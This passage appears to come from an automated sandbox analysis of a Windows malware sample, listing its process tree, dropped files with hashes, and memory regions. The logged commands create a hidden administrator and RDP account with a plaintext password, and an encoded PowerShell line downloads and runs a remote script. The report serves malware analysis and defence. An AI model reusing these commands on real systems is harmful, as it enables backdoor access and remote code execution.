- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc leaP4oKy /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc leaP4oKy1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc leaP4oKy2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc leaP4oKy3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESCC7.tmpMD5
b3ed24cfd539c757ba78cc9d5a179adf
SHA10560de4cc03ed282cdce5d7ba2238f831069415c
SHA256637fb9901f4eb7e86f5bab67dc4f7a122ed53d335e7bcfd2f9150c5f3f982dfc
SHA5124a705be11f7a55f47dda7c709cf8bf400de85c9f091371c643199c53301b2f1087e79e065ab645e15b476964632f3ca9cf96a0d2e8f61329cac1992827f9ebcf
-
C:\Users\Admin\AppData\Local\Temp\Setup.zipMD5
36f178576dcb8db35d6f06448b1eb510
SHA162277c90cc2b1bb81b36571037afe5081b0605d5
SHA256192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA5129e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exeMD5
03051f3c44a2c8d196c95ea458b0aff4
SHA1d19a86e11cccdf978ca2d1455d7026d7879869f7
SHA256555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
SHA512883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
-
C:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.dllMD5
78316c923481b1f1c3dbebf3b3bac369
SHA145f6ca94d5d00b2f54ee2f82ba728397ca664aaa
SHA2562f683842fbb64a1e0c816525c01fa5fcad453b3b3e34b6acc0aba6f4c59b3068
SHA5127415c49ddf3f38dc8d7c166c649c0ad7609794d87b156871d57338398566f9d1ad91e653057895edfe53345bf7293b3ad2d693dd1084ac09abad45d855f4a173
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exeMD5
eaee663dfeb2efcd9ec669f5622858e2
SHA12b96f0d568128240d0c53b2a191467fde440fd93
SHA2566c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exeMD5
c9622e294a0f3c6c4dfcf716cd2e6692
SHA1829498d010f331248be9fd512deb44d1eceac344
SHA256f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeMD5
27cfb3990872caa5930fa69d57aefe7b
SHA15e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA25643881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.configMD5
ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA2569c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA51285766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\CSCE599C57EBA6F41B09372974D9DECE673.TMPMD5
7674fb62b97c681ba739627ccfa831f1
SHA1c7c9a294859087205b4a4234cef9cf2ffd1d0688
SHA256a3d37ae906cc1ad031b142902fa4af7783bc6b16c34f7fb932cfd1effe426446
SHA512840543ce21f25ea320b7e60947868c83d34a45bef5995c9cfee8d26b179f11b5987d35dcd1e2df84e0b52fcccc17597c77578e83b4970fcb175860dea1b592fb
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.cmdlineMD5
c5b8b4d6484df600c9ad1efb4e8cb2dd
SHA171e459785921e7130dbe889aceb0c645ec8d6f4b
SHA25653feec5f42db1f6d56f7a5c2a4e92b3e94be377cb72fccc429546a057b38b544
SHA5127ed4359aeb5038849cea88d534918523a52d7ae62b886efe2f87ff8c432f0bef7881a472ada49ef23b55d19dd7d80679f0984ded8e08ba8f83f4fe4c117d0d35
-
\Windows\Branding\mediasrv.pngMD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
\Windows\Branding\mediasvc.pngMD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
-
memory/1028-318-0x0000000000000000-mapping.dmp
-
memory/1868-114-0x0000000000C70000-0x0000000000C71000-memory.dmpFilesize
4KB
-
memory/1868-116-0x0000000001990000-0x0000000001992000-memory.dmpFilesize
8KB
-
memory/2152-125-0x0000000000000000-mapping.dmp
-
memory/2760-362-0x0000000000000000-mapping.dmp
-
memory/2784-160-0x0000024CB8C80000-0x0000024CB8C81000-memory.dmpFilesize
4KB
-
memory/2784-153-0x0000024CB8BD3000-0x0000024CB8BD5000-memory.dmpFilesize
8KB
-
memory/2784-152-0x0000024CB8BD0000-0x0000024CB8BD2000-memory.dmpFilesize
8KB
-
memory/2784-154-0x0000024CB8BD6000-0x0000024CB8BD8000-memory.dmpFilesize
8KB
-
memory/2784-141-0x0000024CB8C30000-0x0000024CB8C31000-memory.dmpFilesize
4KB
-
memory/2784-170-0x0000024CD15D0000-0x0000024CD15D1000-memory.dmpFilesize
4KB
-
memory/2784-144-0x0000024CD0F50000-0x0000024CD0F51000-memory.dmpFilesize
4KB
-
memory/2784-171-0x0000024CD1960000-0x0000024CD1961000-memory.dmpFilesize
4KB
-
memory/2784-180-0x0000024CB8BD8000-0x0000024CB8BD9000-memory.dmpFilesize
4KB
-
memory/2784-136-0x0000000000000000-mapping.dmp
-
memory/3016-123-0x0000000005C50000-0x0000000005C51000-memory.dmpFilesize
4KB
-
memory/3016-122-0x0000000005C10000-0x0000000005C41000-memory.dmpFilesize
196KB
-
memory/3016-120-0x0000000000D30000-0x0000000000D31000-memory.dmpFilesize
4KB
-
memory/3016-117-0x0000000000000000-mapping.dmp
-
memory/3176-371-0x0000000000000000-mapping.dmp
-
memory/3708-374-0x0000000000000000-mapping.dmp
-
memory/3988-129-0x00000234C4ED0000-0x00000234C517A000-memory.dmpFilesize
2.7MB
-
memory/3988-134-0x00000234C4C16000-0x00000234C4C17000-memory.dmpFilesize
4KB
-
memory/3988-133-0x00000234C4C15000-0x00000234C4C16000-memory.dmpFilesize
4KB
-
memory/3988-124-0x0000000000000000-mapping.dmp
-
memory/3988-131-0x00000234C4C10000-0x00000234C4C12000-memory.dmpFilesize
8KB
-
memory/3988-132-0x00000234C4C13000-0x00000234C4C15000-memory.dmpFilesize
8KB
-
memory/4112-375-0x0000000000000000-mapping.dmp
-
memory/4116-150-0x0000000000000000-mapping.dmp
-
memory/4152-376-0x0000000000000000-mapping.dmp
-
memory/4156-156-0x0000000000000000-mapping.dmp
-
memory/4164-372-0x0000000000000000-mapping.dmp
-
memory/4196-373-0x0000000000000000-mapping.dmp
-
memory/4200-179-0x00000000011A0000-0x00000000011A2000-memory.dmpFilesize
8KB
-
memory/4200-162-0x0000000000000000-mapping.dmp
-
memory/4224-317-0x0000000000000000-mapping.dmp
-
memory/4240-316-0x0000000000000000-mapping.dmp
-
memory/4268-377-0x0000000000000000-mapping.dmp
-
memory/4268-465-0x0000000000000000-mapping.dmp
-
memory/4288-379-0x0000000000000000-mapping.dmp
-
memory/4312-380-0x0000000000000000-mapping.dmp
-
memory/4316-228-0x000001C64F408000-0x000001C64F40A000-memory.dmpFilesize
8KB
-
memory/4316-178-0x0000000000000000-mapping.dmp
-
memory/4316-189-0x000001C64F400000-0x000001C64F402000-memory.dmpFilesize
8KB
-
memory/4316-190-0x000001C64F403000-0x000001C64F405000-memory.dmpFilesize
8KB
-
memory/4316-200-0x000001C64F406000-0x000001C64F408000-memory.dmpFilesize
8KB
-
memory/4324-464-0x0000000000000000-mapping.dmp
-
memory/4332-378-0x0000000000000000-mapping.dmp
-
memory/4340-356-0x0000000000000000-mapping.dmp
-
memory/4380-384-0x0000000000000000-mapping.dmp
-
memory/4380-450-0x000001C4FCC68000-0x000001C4FCC69000-memory.dmpFilesize
4KB
-
memory/4380-397-0x000001C4FCC60000-0x000001C4FCC62000-memory.dmpFilesize
8KB
-
memory/4380-398-0x000001C4FCC63000-0x000001C4FCC65000-memory.dmpFilesize
8KB
-
memory/4380-399-0x000001C4FCC66000-0x000001C4FCC68000-memory.dmpFilesize
8KB
-
memory/4392-383-0x0000000000000000-mapping.dmp
-
memory/4572-381-0x0000000000000000-mapping.dmp
-
memory/4656-382-0x0000000000000000-mapping.dmp
-
memory/4728-355-0x0000000000000000-mapping.dmp
-
memory/4752-229-0x00000164ACFE0000-0x00000164ACFE2000-memory.dmpFilesize
8KB
-
memory/4752-222-0x0000000000000000-mapping.dmp
-
memory/4752-230-0x00000164ACFE3000-0x00000164ACFE5000-memory.dmpFilesize
8KB
-
memory/4752-265-0x00000164ACFE6000-0x00000164ACFE8000-memory.dmpFilesize
8KB
-
memory/4768-359-0x0000000000000000-mapping.dmp
-
memory/4812-360-0x0000000000000000-mapping.dmp
-
memory/4856-361-0x0000000000000000-mapping.dmp
-
memory/4904-363-0x0000000000000000-mapping.dmp
-
memory/4920-364-0x0000000000000000-mapping.dmp
-
memory/4936-365-0x0000000000000000-mapping.dmp
-
memory/4956-366-0x0000000000000000-mapping.dmp
-
memory/5000-369-0x0000000000000000-mapping.dmp
-
memory/5012-370-0x0000000000000000-mapping.dmp
-
memory/5016-260-0x0000000000000000-mapping.dmp
-
memory/5016-300-0x00000264FE756000-0x00000264FE758000-memory.dmpFilesize
8KB
-
memory/5016-298-0x00000264FE750000-0x00000264FE752000-memory.dmpFilesize
8KB
-
memory/5016-299-0x00000264FE753000-0x00000264FE755000-memory.dmpFilesize
8KB